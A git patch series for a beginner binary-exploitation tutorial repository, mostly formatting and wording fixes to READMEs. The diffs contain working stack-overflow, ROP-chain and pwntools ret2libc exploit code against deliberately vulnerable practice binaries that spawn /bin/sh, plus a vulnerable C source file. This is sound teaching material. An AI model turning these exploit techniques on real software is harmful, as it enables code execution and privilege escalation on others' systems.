811ebc2..a2bb2a1 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -119,7 +119,7 @@ r=process("./exercise-4") ``` -after this, we know we'll need the `read()`,`wrte()`, the GOT address of +after this, we know we'll need the `read()`,`write()`, the GOT address of `read()`, and a `pop ; ret` ropgadget, so we add these in. ```Pyton write_plt = p32(binary.symbols["write"]) From e8b18f381e2dbb551bff4de40dc045efcc5d3c6a Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:04:48 -0500 Subject: [PATCH 26/48] Fixed grammar and formatting issues --- exercise-1/README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/exercise-1/README.md b/exercise-1/README.md index 3f35b04..1a7266c 100644 --- a/exercise-1/README.md +++ b/exercise-1/README.md @@ -46,7 +46,7 @@ $ strace ./overflow2 $(python -c 'print "A"*32') ... --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} --- ``` -The address in question is 0x41414141, our four "A"s. What does this mean? +The address in question is `0x41414141`, or four "A"s. What does this mean? Consider the disassembly of the function `vuln()`, as well as `main()` where it's called. ``` @@ -72,13 +72,13 @@ Dump of assembler code for function vuln: End of assembler dump. ``` So you might remember from [Intro 2](../intro-2) that you can overwrite values -on the stack with a `strcpy()` vulnerability. In the lines of `main()` , +on the stack with a `strcpy()` vulnerability. In the lines of `main()`, control is passed to the function`vuln()`. However, `vuln()` needs to know where to come back to in `main()` when it finishes. This is called a return address. In -this case, `vuln()` should jump back to 0x0804851b, the instruction right after +this case, `vuln()` should jump back to `0x0804851b`, the instruction right after `main()` calls `vuln()`. When we get a SEGFAULT that we control, that means that we've overwritten the return address. What can we do with this? The -possibilites are pretty much endless. You have control over the code's flow, +possibilities are pretty much endless. You have control over the code's flow, so maybe we can call some other function, namely `give_shell()` ``` $ objdump -d overflow2 | grep give_shell @@ -87,7 +87,7 @@ $ objdump -d overflow2 | grep give_shell Now that we have the address of a useful function, let's see if we can supply *our own* return address. First, as you may remember from the last tutorial, some of these characters aren't printable. We'll need to convert it to an -escape sequence and reverse the order, leaving us with this: "\xad\x84\x04\x08" +escape sequence and reverse the order, leaving us with this: `"\xad\x84\x04\x08"` Now we can substitute it in! ``` $ ./overflow2 $(python -c 'print "A"*28 + "\xad\x84\x04\x08"') From aa0d3dfc8dbe95392984e8453de97c11e3acfb45 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:06:32 -0500 Subject: [PATCH 27/48] formatting in exercise-2 --- exercise-2/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exercise-2/README.md b/exercise-2/README.md index 4565bab..940068f 100644 --- a/exercise-2/README.md +++ b/exercise-2/README.md @@ -48,7 +48,7 @@ Since ASLR randomizes libc addresses as well, the binary needs some way to reliably call the functions it uses. The PLT is a wrapper function for the actual code in libc. **The PLT is a part of the binary, it's address doesn't change.** If you call `system@plt`, you'll call `system()`. So how are we going -to do this? Since the PLT is a part of the binary, we'll use objump +to do this? Since the PLT is a part of the binary, we'll use `objdump`. ``` $ objdump -d overflow | grep system 080483d0 : @@ -79,9 +79,9 @@ the stack. Calling a function in an exploit has to take this form: \[address of function\] \[return address\] \[argument\] Now when the programmer wrote this, (I wrote this one :P) he thought he could -be smart and make fun of you for not having a "/bin/sh" string. However, he +be smart and make fun of you for not having a `"/bin/sh"` string. However, he didn't realize that by including that string in the code, the string is in the -binary. We can use gdb to find the string! +binary. We can use `gdb` to find the string! ``` $ gdb -q ./overflow From 6635e7b62ce4b723c40eff321167c99c0f01227e Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:08:51 -0500 Subject: [PATCH 28/48] Formatting and grammar refactoring in exercise-3 --- exercise-3/README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/exercise-3/README.md b/exercise-3/README.md index f98ee9a..9fe8051 100644 --- a/exercise-3/README.md +++ b/exercise-3/README.md @@ -1,6 +1,6 @@ # Follow the Yellow Brick Functions -In this problem, I smartened up. Nowhere in the binary will you find "/bin/sh" +In this problem, I smartened up. Nowhere in the binary will you find `"/bin/sh"` ```C # include @@ -28,7 +28,7 @@ int main(int argc, char **argv) { } ``` -As you'll remember from the previous exercise, putting "/bin/sh" in the binary +As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary was a mistake. This problem is geared very similarly with a little bit of extra finesse. First things first, we'll find the offset of `%eip` @@ -50,10 +50,10 @@ scratch pad for hackers. We can use it to reliably store data when the stack is randomized. We could use the GOT, but it might mess up functions we need. Knowing this, how can we get a shell? -The answer lies in the functions used. We have the strings "/b" and "in/" in -the binary. We also have "sh" at the end of the second print statement! :D +The answer lies in the functions used. We have the strings `"/b"` and `"in/"` in +the binary. We also have `"sh"` at the end of the second print statement! :D -Let's use objdump to get some function addresses: +Let's use `objdump` to get some function addresses: ``` $ objdump -d overflow | grep ">:" ... @@ -63,7 +63,7 @@ $ objdump -d overflow | grep ">:" 080483a0 : ``` -Next we will need to find the start of the .bss segment +Next we will need to find the start of the `.bss` segment ``` $ gdb -q ./overflow @@ -104,7 +104,7 @@ overflow : 0x80486ce --> 0x75006873 ('sh') overflow : 0x80496ce --> 0x75006873 ('sh') ``` -Now with these we can learn one more importand concept: Chaining Functions. +Now with these we can learn one more important concept: Chaining Functions. In order to chain functions together we need to somehow remove the arguments off of the stack. As you know from before, standard x86 function calls look like: @@ -154,9 +154,9 @@ Let's give the exploit a try: "\x80\x83\x04\x08" + "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\x4e\x95\x04\x08" + "\x70\x83\x04\x08" + "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\x65\x95\x04\x08" + "\x70\x83\x04\x08" + -"\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\xce\x96\x04\x08" + +"\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\xce\x96\x04\x08" + "\xa0\x83\x04\x08" + "FAKE" + "\x30\xa0\x04\x08"') ``` -You should get a shell (Although It might we a weird one and not let you do +You should get a shell (Although it might be a weird one and not let you do anything. I forgot to set privs :/ The concept still stands :P) From e1d52f014ea9c0443759e7d8a07515af5cbfce5c Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:09:57 -0500 Subject: [PATCH 29/48] Formatting in exercise-3.5 --- exercise-3.5/README.md | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/exercise-3.5/README.md b/exercise-3.5/README.md index 43af273..b4f13d4 100644 --- a/exercise-3.5/README.md +++ b/exercise-3.5/README.md @@ -17,7 +17,6 @@ context(arch='i386', os='linux') this just sets the context for other functions that we'll describe later. - ``` binary = ELF("some_challenge") libc = ELF("some_libc") @@ -28,7 +27,6 @@ useful; they give you access to a wide array of methods and data fields. I almost always have both of these lines in my script, even if the libc one is commented out. - ``` r=process("./some_challenge") ``` @@ -51,7 +49,7 @@ say for example the address of write() in a binary is 0xdeadbeef \xef\xbe\xed\xda ``` -would be the resulting python escape. However, pwntools can take care of this. +would be the resulting python escape. However, `pwntools` can take care of this. ``` write = p32(binary.symbols["write"]) @@ -70,5 +68,5 @@ r.send("This also sends a string") ``` Now me telling you all of this is kind of useless without you getting real -experience.** At this point I would strongly recommend solving the first 3 +experience. **At this point I would strongly recommend solving the first 3 challenges using pwntools.** From a1620ed18fdebf4a39b0095e5b48273e8982eb34 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:13:26 -0500 Subject: [PATCH 30/48] Formatting and word smithing in excercise-4 --- exercise-4/README.md | 32 +++++++++++++++----------------- 1 file changed, 15 insertions(+), 17 deletions(-) diff --git a/exercise-4/README.md b/exercise-4/README.md index a2bb2a1..87d0013 100644 --- a/exercise-4/README.md +++ b/exercise-4/README.md @@ -7,7 +7,7 @@ call to `system()`? The simple answer: get a shell anyways. :) The long answer is a bit more complicated. This attack is called a return to -libc, or ret2libc for short. If you don't remember the PLT and GOT from before, +`libc`, or `ret2libc` for short. If you don't remember the PLT and GOT from before, now is a good time to check the [glossary](../terms) and maybe do some googling. You'll recall that ASLR randomizes the libc address, but the good news is that with arbitrary `read()` and `write()` you can easily circumvent @@ -38,7 +38,6 @@ address. Still confused? I was when I first learned this, but I'll try to explain as I go. - First, we have to calculate the offset of `%eip` ``` $ python -c 'print "A"*140 + "BBBB"' | strace ./exercise-4 @@ -48,14 +47,13 @@ $ python -c 'print "A"*140 + "BBBB"' | strace ./exercise-4 After 140 bytes, we have `%eip` -From here, we need to leak the address of a libc function. +From here, we need to leak the address of a `libc` function. We can do this by calling `write(1,&function,4)` I'll be using the GOT address of `read()` (remember that the GOT is an array of pointers into libc) - ``` $ objdump -d exercise-4 | grep ">:a" ... @@ -70,7 +68,6 @@ $ objdump -R exercise-4 With these addresses, we get the following exploit. - ``` python -c 'print "A"*140 + "\x70\x83\x04\x08" + "RETN" + "\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00"' | ./exercise-4 @@ -94,18 +91,18 @@ $ ldd exercise-4 /lib/ld-linux.so.2 (0xf76fa000) ``` -Since this is a local binary challenge, the libc file is just going to be +Since this is a local binary challenge, the `libc` file is just going to be whatever the standard one is on your computer. **The same binary running on a -different machine could have a different libc.** +different machine could have a different `libc`, and therefore give you different results.** -All we have to do is grab a copy of that libc and put it in our directory -If you ever exploit a remote binary and you don't have the libc, there are +All we have to do is grab a copy of that `libc` and put it in our directory +If you ever exploit a remote binary and you don't have the `libc`, there are plenty of places you can get them online. ``` $ cp /lib/i386-linux-gnu/libc.so.6 ./ ``` -Now we need pwntools. +Now we need `pwntools`. We'll start our script off with the typical items: @@ -118,9 +115,9 @@ libc = ELF("libc.so.6") r=process("./exercise-4") ``` - after this, we know we'll need the `read()`,`write()`, the GOT address of `read()`, and a `pop ; ret` ropgadget, so we add these in. + ```Pyton write_plt = p32(binary.symbols["write"]) read_GOT = p32(binary.symbols["got.read"]) @@ -137,9 +134,9 @@ r.recvline() Now we should start building our exploit. We want to try to avoid using the escape strings from before, it makes for nicer code and forces you to use -pwntools the right way. +`pwntools` the right way. -we add: +So, we add: ```Python exploit = "A"*140 # EIP offset @@ -155,8 +152,8 @@ r.sendline(exploit) ``` Now here's the cool part. Since we know that the program prints out the address -of `read()` in the libc (remember those funky bytes from earlier before the -SEGFAULT?) we can take those and calculate the base address of libc. This +of `read()` in the `libc` (remember those funky bytes from earlier before the +SEGFAULT?) we can take those and calculate the base address of `libc`. This indirectly means that we can call any function in the standard library. ``` @@ -174,8 +171,8 @@ subtract `read()`s address in the regular libc, giving us the base address for this runtime. In the last line, we add the offset of `system()` in the libc to our calculated base. This gives us the address of system for this runtime. -The best part of this whole show is that the pesky "/bin/sh" string we seem to -keep needing is in the libc! We can calculate the address of that as well! +The best part of this whole show is that the pesky `"/bin/sh"` string we seem to +keep needing is in the `libc`! We can calculate the address of that as well! ``` binsh = p32(libc_base + libc.search("/bin/sh").next()) @@ -184,6 +181,7 @@ binsh = p32(libc_base + libc.search("/bin/sh").next()) Now all we've got to do is send our exploit with some extra padding (it was 140 before, but now it's 148 since we overflow from before the stack frame) and we get a shell. + ``` r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148? r.interactive() From e9e92dda8ba6667b603489871dc29195fb4d50c1 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:23:24 -0500 Subject: [PATCH 31/48] Rewrote sections of intro-1 for clarity and accuracy --- intro-1/README.md | 54 +++++++++++++++++++++++++---------------------- 1 file changed, 29 insertions(+), 25 deletions(-) diff --git a/intro-1/README.md b/intro-1/README.md index 515177c..d2ecbe6 100644 --- a/intro-1/README.md +++ b/intro-1/README.md @@ -1,8 +1,8 @@ # Intro 1: What is a binary, really? -In short, a binary is what happens when you take high level code such as C or -C++, and compile it into something the computer can actually run. I believe in -hands on learning, so we can take a look inside one to really find out. +In short, a binary is the output file that the computer can actually run when you +compile high level code, such as C or C++. I believe in hands on learning, so +we can take a look inside one to really find out. Consider the file [hello_world.c](hello_world.c): ```C @@ -12,22 +12,27 @@ int main() { } ``` -This is your average C file, more or less. It's got a main, some includes, and -a little bit of code to be run. However, your computer can't actually run it. -In order to make it usable, we can run: +This is your average C file, more or less. It's got a main function, some +includes, and a little bit of code to be run. However, your computer can't +actually run it. In order to make it usable, we must compile it: + ``` $ gcc -m32 hello_world.c -o hello_world.bin ``` -You can ignore the `-m32` argument (you'll learn about it later), but the -`-o hello_world.bin` simply specifies what the name of the output file is. + +You can ignore the `-m32` argument (we'll talk about it later), but the +`-o hello_world.bin` simply specifies what the name of the output file +is going to be. From here, we can execute it: ``` $ ./hello_world.bin Hello World! ``` + Unsurprisingly, we get "Hello World!" as the output. But let's go a bit deeper. -We can open gdb (GNU Debugger) and see what's happening under the hood: +We can open `gdb (GNU Debugger)` and see what's happening under the hood: + ``` $ gdb -q ./hello_world.bin Reading symbols from ./hello_world.bin...(no debugging symbols found)...done. @@ -44,13 +49,12 @@ Dump of assembler code for function main: End of assembler dump. gdb-peda$ quit ``` -Firstly, your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. -Don't worry about this, my gdb is modified. -The weird stuff that gdb showed us is called assembly language. It's -essentially the lowest level human readable code out there. Each line of that -code maps one to one with a machine instruction. Let me break this down for -you. +Your prompt probably looks like `(gdb)`, whereas mine is `gdb-peda$`. Don't worry about this, my gdb is modified. + +The weird code that `gdb` displayed is called assembly language. It's the lowest +level human readable code out there. Each line maps directly to a machine instruction. +Let's break this down. ``` 0x0804841d <+0>: push %ebp @@ -58,26 +62,26 @@ you. 0x08048420 <+3>: and $0xfffffff0,%esp 0x08048423 <+6>: sub $0x10,%esp ``` -First, the numbers you see on the left are addresses. Just like your house -address, `0x0804841d` is where the instruction ` push %ebp` lives. These -first four instructions are just conventions for a function, in this case -`main()`. + +The numbers you see on the left are addresses. You can think of these just like your house +address: `0x0804841d` is where the instruction `push %ebp` lives. These +first four instructions are just conventions for a function, in this case `main()`. ``` 0x08048426 <+9>: movl $0x80484d0,(%esp) 0x0804842d <+16>: call 0x80482f0 ``` -These instructions are what actually prints out our "Hello World!". The program -moves the address of the string "Hello World!" into the memory that `%esp` -points to. `%esp` is a register. It holds four bytes of information for quick -access, usually some address. Our program then calls `puts()`, which prints out +These instructions are what actually print out "Hello World!". The program +moves the address of the string `"Hello World!"` into the memory address that `%esp` +points to. `%esp` is a register, which you can think of as a special place the processor uses for storing values it needs quick access to. Each register can hold up to four bytes, usually some memory address. Our program then calls the `puts()` function, which prints out whatever is at the address we supplied. + ``` 0x08048432 <+21>: leave 0x08048433 <+22>: ret ``` -Finally, these last two just pass control from our `main()` back to the C -library, which does some cleaning up and then exits. We'll be learning more +The last two instructions just return control from our `main()` function back to the C +library, which does some clean up and then exits the program. We'll be learning more about how these binaries function in later tutorials. From 1ff091f1d45be0da4f53c71c6711e75f72fb6c78 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:36:11 -0500 Subject: [PATCH 32/48] Rewrote buffer overflow attack explanation --- intro-2/README.md | 66 +++++++++++++++++++++++++++++------------------ 1 file changed, 41 insertions(+), 25 deletions(-) diff --git a/intro-2/README.md b/intro-2/README.md index 899f0a8..1ae6ec4 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -3,8 +3,8 @@ **Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** -Now that you've gotten your feet wet with binaries, it's time to dive in -headfirst. Consider the file [overflow1.c]() +Now that you've gotten your feet wet with binaries, it's time to dive in to exploitation with the stack. Consider the file [overflow1.c]() + ```C #include #include @@ -39,11 +39,14 @@ int main(int argc, char **argv) { return 0; } ``` -You can tell just by reading through it that the obvious objective here is to -make `win==1` a true statement, but we're going to ignore that for a few + +You can tell just by reading through this file that the obvious objective here is to +make `win == 1` a true statement, but we're going to ignore that for a few minutes to learn about the stack. The stack is dynamic memory that the program -uses to store addresses, arguments, and all sorts of other goodies. For -example: +uses to store addresses, arguments, and all sorts of other goodies. + +Here's an example stack dump: + ``` $ ./overflow1-3948d17028101c40 Usage: stack_overwrite [str] @@ -75,10 +78,12 @@ Stack dump: win = 0 Sorry, you lose. ``` -Now if you know a thing or two about ASCII, you'll know that 0x41 is the value -of "A". At the bottom of the stack dump, you'll notice that the beginning of -the buffer contains 0x41414141, or our four A's. Now we can run it again, only -this time we'll put a few more. Pay attention to the addresses on the left :) + +Now if you know a thing or two about ASCII, you'll know that `0x41` is the value +of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of +the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only +this time we'll store a few more `A`'s. Pay attention to the addresses on the left :) + ``` /overflow1-3948d17028101c40 $(python -c 'print "A"*76') Stack dump: @@ -108,25 +113,36 @@ Stack dump: win = 1094795585 Sorry, you lose. ``` -This bit: `$(python -c 'print "A"*76')` just makes python print out 76 "A"s. -Now you'll notice that the addresses on the left are completely different than -the first run. This is normal. Most binaries these days have ASLR enabled, a -protection that randomizes stack addresses from run to run. However, you might -notice that `win = 1094795585` according to the stack dump. What just happened? + +This shell command: `$(python -c 'print "A"*76')` tells python to print out 76 "A"s. + +Notice that the addresses on the left are completely different than the first run. This is normal, and due to something called `ASLR`, or Address Space Layout Randomization. Most modern OSes have `ASLR` enabled, which is protection that randomizes stack addresses on each run of a program. + +Now, you might notice that `win = 1094795585` according to the stack dump. What just happened? Back to the source: + ```C char buf[64]; strcpy(buf, str); ``` -Our buffer only holds 64 bytes. However, `strcpy()` is a dangerous function. -The buffer we provide contains 76 bytes. `strcpy()` doesn't care about checking -lengths. Instead, those extra 12 bytes that don't fit just get thrown onto the -stack. The value of `win` was stored right next to our buffer, so let's try to -set `win=1.` This is where things get a bit tricky. "1", as in the string, is -0x30. We need to submit 0x1, which isn't printable. Since `win` is right next -to our buffer on the stack, we can just submit 64 "A"s, followed by one "\x01" -to leak into the last byte of `win`. + +`strcpy()` is a dangerous function! Our buffer only holds 64 bytes, however, the buffer we provide contains 76 bytes. +And `strcpy()` doesn't care about checking lengths. + +So what happens to those extra 12 bytes that don't fit? They just get thrown onto the +stack. + +The value of `win` was stored right next to our buffer, so next, let's try to +set the value of `win` to `1`. + +This is where things get a bit tricky... + +`"1"`, in string format, is `0x30` in hex. Note the different from integer `1`, which is `0x1` in hex, and isn't printable. + +Since `win` is right next to our buffer on the stack, we can just submit 64 `A`'s in character format, followed by a single `"\x01"` +to leak into the last byte of `win`, setting `win = 1`. + ``` $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"') Stack dump: @@ -159,5 +175,5 @@ overflow1-3948d17028101c40 overflow1-3948d17028101c40.c README.md $ exit ``` -If you try this for yourself, you'll get a shell. You sucessfully have -manipulated the stack to give you what you want. +If you try this for yourself, you'll get a shell. You've now sucessfully +executed a buffer overflow attack! From 42e25b055f9c28f446ba392435d8ada55b515de8 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:58:11 -0500 Subject: [PATCH 33/48] Updated README --- README.md | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index 5f8d0ad..7183044 100644 --- a/README.md +++ b/README.md @@ -4,14 +4,15 @@ Greetings, fellow hacker, hobbyist, or computer enthusiast. If you've been looking for a place to start learning binary exploitation, then you're in luck. -This tutorial is intended for anyone with experience in coding, Ideally C or +This tutorial is intended for anyone with experience in coding, ideally C or C++, but I only knew Python when I started. + Written by someone who is just barely better than "incompetent," I'll be explaining how I learned my skills. These tutorials will be a bit long winded, but hopefully they will be informative and entertaining. Please feel free to contact me about any clarifications that should be included in the tutorials. -**This is intended for linux. It's free if you don't already have it. Don't +**This is intended for Linux. It's free if you don't already have it. Don't want to dual boot? Get a VM.** -Best of luck @@ -19,6 +20,7 @@ want to dual boot? Get a VM.** [Bretley](https://github.com/Bretley) ## The Grand Glossary of Terms + I've compiled this list of as many useful things as I could find. It contains all sorts of goodies that I wish I had found or had explained to me earlier. If you have a question, it can probably be answered in here. Otherwise, get your @@ -27,21 +29,21 @@ Google-Fu on * [The Glossary](terms) ## External Tools. + I strongly recommend you install and use the following tools to make your life a bit easier: * [longld/peda](https://github.com/longld/peda/): I use this tool in all of these tutorials. It provides a wide range of useful functions and makes `gdb` -far more user friendly. Just follow the install instructions in the repo. + far more user friendly. Just follow the install instructions in the repo. * [Gallopsled/pwntools](https://github.com/Gallopsled/pwntools): pwntools is an exploit framework built in my favorite language, python. It has a whole slew -of useful functions and chicanery that makes the exploit process more fun and -less painful. It can be installed by running `sudo pip install pwntools` - - + of useful functions and chicanery that makes the exploit process more fun and + less painful. It can be installed by running `sudo pip install pwntools` ## Introductory Tutorials: + * [Setup Script](./install.sh) * [Intro 1: What is a binary, really?](intro-1) * [Companion Video](https://youtu.be/6cNbKnxbAWw) From e6d8c2a86bf6712bbcd533b2931465541d787d79 Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 01:58:44 -0500 Subject: [PATCH 34/48] Restructured glossary, replaced incorrect information with correct information, formatting and wording --- terms/README.md | 81 ++++++++++++++++++++++--------------------------- 1 file changed, 37 insertions(+), 44 deletions(-) diff --git a/terms/README.md b/terms/README.md index a88f9fd..466c0b8 100644 --- a/terms/README.md +++ b/terms/README.md @@ -1,69 +1,62 @@ -# Words, Terms, and Phrases +# Glossary of Terms -##### This will your dictionary throughout these exercises. If it's not in here, -##### Contact me to ask and I will update it. +Note: If you have a term you'd like added to the list, add an Issue or open a Pull Request. -## General terms for binaries: +## Technical Terms -**Binary:** The binary is the compiled C or C++ file. Anything that is in the -binary has a *constant address.* (usually, see PIE) +* **ASLR (Address Space Layout Randomization):** Security measure in modern OSes to randomize stack and libc addresses on each program execution. -**libc:** A binary is *dynamically linked* and has a libc file. This means that -the whole set of standard library functions are somewhere in memory to be used -by the program +* **Binary:** A binary is the output file from compiling a C or C++ file. Anything in the +binary has a *constant address* (usually... see PIE.) -**PLT:** Stands for Procedure Linkage Table. The PLT is essentially a wrapper function for all -functions directly called in the binary. *These are only used in dynamically -linked binaries* +* **Canary:** A canary is some (usually random) value that is used to verify that +nothing has been overrwritten. Programs may place canaries in memory, and +check that they still have the exact same value after running potentially +dangerous code, verifying the integrity of that memory. -**GOT:** Stands for Global Offset Table. The GOT is a string of pointers into -libc. The PLT calls whatever address is loaded into the GOT at runtime. +* **GOT (Global Offset Table):** The GOT is a table of addresses stored in the data section of memory. Executed programs use it to look up the runtime addresses of global variables that are unknown at compile time. -**Stack:** The stack is part of the memory for a binary. Local variables and -pointers are often stored here. The stack can be randomized. +* **Heap:** The heap is a far more reliable memory space similar to the stack. +However, usage of the heap has to be invoked by the coder, so heap problems are +often their own category of exploitation -**ASLR:** Stands for Address Space Layout Randomization. This means that the -stack and libc addresses are randomized from runtime to runtime. +* **libc:** A binary is *dynamically linked* and has a libc file. This means that +the whole set of standard library functions are located somewhere in the memory used +by the program. -**PIE:** Stands for Position Independent Executable. This is essentially ASLR -but for the binary itself. When this protection is enabled, locations of actual -code in the binary are randomized. +* **NX (Non-Executable):** Security measure in modern OSes to separate processor instructions (code) and data (everything that's not code.) This prevents memory from being both executable and writable. -**NX:** Stands for Non-Executable. This means that no memory is both writable -and executable, so shellcode is useless unless you bypass it. I don't really -cover binaries without NX because they aren't common. +* **PIE (Position Independent Executable):** Essentially ASLR, but for the binary itself. +When this protection is enabled, locations of actual code in the binary are randomized. -**ROP:** Stands for Return Oriented Programming. In regular terms it means that -we reuse tiny bits of code throughout the binary to get what we want. +* **PLT (Procedure Linkage Table):** The PLT is essentially a wrapper function for all +functions directly called in the binary. *Only used in dynamically +linked binaries*. -**Heap:** The heap is a far more reliable memory space similar to the stack. -However, usage of the heap has to be invoked by the coder, so heap problems are -often their own category of exploitation +* **ROP (Return Oriented Programming):** Reusing tiny bits of code throughout the binary to construct commands we want to execute. -**Canary:** A canary is some (usually random) value that is used to verify that -nothing has been overrwritten. Programs may place canaries into memory and -check that they still have the exact same value asfter running potentially -dangerous code, verifying the integrity of that memory. +* **Stack:** The stack is part of the memory for a binary. Local variables and +pointers are often stored here. The stack can be randomized. -## Important functions to look out for: -TODO: ADD MORE. +## Important Functions to Watch Out For: -`system()` : This function can be used to execute commands or even other -binaries if called properly. I think it defaults to sh to handle commands on -most linux flavors +TODO: ADD MORE. -`mprotect()` : This is the function responsible for setting page pivilieges. If +* `mprotect()`: This is the function responsible for setting page pivilieges. If you can call this function with your own arbitrary arguments, you can -effectively bypass NX protection +effectively bypass NX protection. + +* `system()`: This function can be used to execute commands or even other +binaries if called properly. I think it defaults to sh to handle commands on +most Linux flavors. ## General Terms -**Arbitrary:** This word is used to imply the fullness of control that you -might have given an exploit. If you can run *arbitrary* code or read/write -*arbitrary* values, that means you can run, read, or write whatever you choose. +* **Arbitrary:** This word is used to imply the fullness of control that you +might have given an exploit. If you've achieved *arbitrary code execution*, that means you can run, read, or write whatever commands you choose. -**Reliable:** Reliable in the context of binary exploitation is almost exactly +* **Reliable:** Reliable in the context of binary exploitation is almost exactly the same as regular use. An exploit is said to be reliable if it works across different runs consistently. It might seem dumb to define this work, but somtimes with exploits you will only have the option to make an unreliable From 24911ba04e087e706e52551d6aa70a727fb3273a Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:09:54 -0500 Subject: [PATCH 35/48] Renamed overflow1.c and overflow1 binary files --- .../{overflow1-3948d17028101c40 => overflow1} | Bin intro-2/overflow1-3948d17028101c40.c | 32 ---------------- intro-2/overflow1.c | 36 ++++++++++++++++++ 3 files changed, 36 insertions(+), 32 deletions(-) rename intro-2/{overflow1-3948d17028101c40 => overflow1} (100%) delete mode 100644 intro-2/overflow1-3948d17028101c40.c create mode 100644 intro-2/overflow1.c diff --git a/intro-2/overflow1-3948d17028101c40 b/intro-2/overflow1 similarity index 100% rename from intro-2/overflow1-3948d17028101c40 rename to intro-2/overflow1 diff --git a/intro-2/overflow1-3948d17028101c40.c b/intro-2/overflow1-3948d17028101c40.c deleted file mode 100644 index ca8013f..0000000 --- a/intro-2/overflow1-3948d17028101c40.c +++ /dev/null @@ -1,32 +0,0 @@ -#include -#include -#include -#include -#include -#include "dump_stack.h" - -void vuln(int tmp, char *str) { - int win = tmp; - char buf[64]; - strcpy(buf, str); - dump_stack((void **) buf, 23, (void **) &tmp); - printf("win = %d\n", win); - if (win == 1) { - execl("/bin/sh", "sh", NULL); - } else { - printf("Sorry, you lose.\n"); - } - exit(0); -} - -int main(int argc, char **argv) { - if (argc != 2) { - printf("Usage: stack_overwrite [str]\n"); - return 1; - } - - uid_t euid = geteuid(); - setresuid(euid, euid, euid); - vuln(0, argv[1]); - return 0; -} diff --git a/intro-2/overflow1.c b/intro-2/overflow1.c new file mode 100644 index 0000000..4469808 --- /dev/null +++ b/intro-2/overflow1.c @@ -0,0 +1,36 @@ +#include +#include +#include +#include +#include +#include "dump_stack.h" + +void vuln(int tmp, char* str) +{ + int win = tmp; + char buf[64]; + strcpy(buf, str); + dump_stack((void**) buf, 23, (void**) &tmp); + printf("win = %d\n", win); + + if (win == 1) { + execl("/bin/sh", "sh", NULL); + } else { + printf("Sorry, you lose.\n"); + } + + exit(0); +} + +int main(int argc, char** argv) +{ + if (argc != 2) { + printf("Usage: stack_overwrite [str]\n"); + return 1; + } + + uid_t euid = geteuid(); + setresuid(euid, euid, euid); + vuln(0, argv[1]); + return 0; +} From 6194b6f728ca7c2a3c915de3baf25a7b6143301f Mon Sep 17 00:00:00 2001 From: alichtman Date: Mon, 16 Apr 2018 02:10:28 -0500 Subject: [PATCH 36/48] Better explanations, word smithing --- intro-2/README.md | 34 ++++++++++++---------------------- 1 file changed, 12 insertions(+), 22 deletions(-) diff --git a/intro-2/README.md b/intro-2/README.md index 1ae6ec4..de6aa97 100644 --- a/intro-2/README.md +++ b/intro-2/README.md @@ -1,9 +1,8 @@ # Intro 2: Screwing aroung with the stack. -**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used -here.** +**Credit to [Picoctf 2013](2013.picoctf.com) for the binary and source used here.** -Now that you've gotten your feet wet with binaries, it's time to dive in to exploitation with the stack. Consider the file [overflow1.c]() +Now that you've gotten your feet wet with binaries, it's time to dive in to exploitation with the stack. Consider the file [overflow1.c](overflow1.c) ```C #include @@ -40,10 +39,7 @@ int main(int argc, char **argv) { } ``` -You can tell just by reading through this file that the obvious objective here is to -make `win == 1` a true statement, but we're going to ignore that for a few -minutes to learn about the stack. The stack is dynamic memory that the program -uses to store addresses, arguments, and all sorts of other goodies. +You can tell just by reading through this file that the obvious objective here is to make `win == 1` a true statement, but we're going to ignore that for a few minutes to learn about the stack. The stack is dynamic memory that the program uses to store addresses, arguments, and all sorts of other goodies. Here's an example stack dump: @@ -79,10 +75,7 @@ win = 0 Sorry, you lose. ``` -Now if you know a thing or two about ASCII, you'll know that `0x41` is the value -of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of -the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only -this time we'll store a few more `A`'s. Pay attention to the addresses on the left :) +Now if you know a thing or two about ASCII, you'll know that `0x41` is the value of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only this time we'll store a few more `A`'s. Pay attention to the addresses on the left :) ``` /overflow1-3948d17028101c40 $(python -c 'print "A"*76') @@ -127,21 +120,19 @@ char buf[64]; strcpy(buf, str); ``` -`strcpy()` is a dangerous function! Our buffer only holds 64 bytes, however, the buffer we provide contains 76 bytes. -And `strcpy()` doesn't care about checking lengths. 